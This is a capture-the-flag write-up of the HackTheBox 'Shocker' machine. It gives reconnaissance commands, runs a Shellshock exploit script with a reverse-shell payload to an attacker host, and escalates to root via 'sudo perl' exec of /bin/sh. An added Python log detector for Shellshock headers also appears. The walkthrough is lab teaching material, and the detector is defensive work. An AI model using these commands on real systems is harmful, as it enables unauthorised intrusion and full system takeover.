HackTheBox: Shocker machine

ratiros01
3 min read · Jun 8, 2020

[Reconnaissance]

1. Port scan

nmap -Pn <ip>

2. Scan for everything

nmap -A -p 80,2222 <ip>

3. Vulnerability scan

nmap --script vuln -p 80,2222 <ip>

4. Try to log in with SSH.

ssh <ip> -p 2222

5. Directory fuzzing

dirb http://<ip>

6. Scan /cgi-bin/

dirb http://<ip>/cgi-bin/ -X .sh

Found something: a shell script served from /cgi-bin/ could mean Shellshock.

[Exploitation]

1. Search for exploits

searchsploit shellshock cgi

2. Copy script no. 34900

searchsploit -m 34900

3. Read the script for usage

4. Run the script

python 34900.py payload=reverse rhost=<target ip> lhost=<attacker ip> lport=1235 pages=/cgi-bin/user.sh

Success!!!
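From the defender's side, the request the script sends above leaves a recognisable trace in the web server's access log: the Bash function-definition prefix "() {" inside a header that mod_cgi exports into the environment of the CGI script. The following detector is an added example, not part of this writeup or of the 34900 script; the log format parser, field names and sample log lines are my own constructions.

```python
import re
from typing import Dict, List

# Apache "combined" log line: client, ident, user, [time], "request",
# status, size, "Referer", "User-Agent". Field names are my own choice.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock signature: the Bash function-definition prefix "() {".
# mod_cgi exports request headers (User-Agent, Referer, ...) as
# environment variables, which is where a vulnerable Bash parses them.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log; the two hostile lines carry only a harmless echo.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jun/2020:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Jun/2020:10:00:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo probe"
10.0.0.9 - - [08/Jun/2020:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 137 "() { :; }; echo probe" "curl/7.58.0"
10.0.0.7 - - [08/Jun/2020:10:00:12 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 275 "-" "Mozilla/5.0 (dirb 2.22)"
"""


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line whose Referer or User-Agent carries
    the Shellshock prefix. 'cgi' marks requests aimed at /cgi-bin/, where
    the header actually reaches a Bash-backed script and deserves priority."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:  # unparsable line: skip rather than crash the pipeline
            continue
        f = m.groupdict()
        for field in ("referer", "agent"):
            if SHELLSHOCK_RE.search(f[field]):
                parts = f["request"].split(" ")
                hits.append({
                    "ip": f["ip"],
                    "time": f["time"],
                    "field": field,
                    "path": parts[1] if len(parts) > 1 else f["request"],
                    "cgi": "/cgi-bin/" in f["request"],
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG.splitlines()):
        print(hit)
```

The prefix match is deliberately broad, as in common IDS rules, so review hits rather than block on them automatically; the real fix is a patched Bash and, where possible, no Bash-backed CGI scripts at all.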

5. Verify user

whoami

Seems like I have shelly’s privileges.

6. Read user.txt

cd /home/shelly
cat user.txt

7. Privilege escalation

Verify sudo privileges

sudo -l

I can “sudo perl”.

Use the command from this site: https://gtfobins.github.io/gtfobins/perl/#sudo

sudo perl -e 'exec "/bin/sh";'
whoami

Now I’m root.

8. Read root.txt

cd /root
cat root.txt
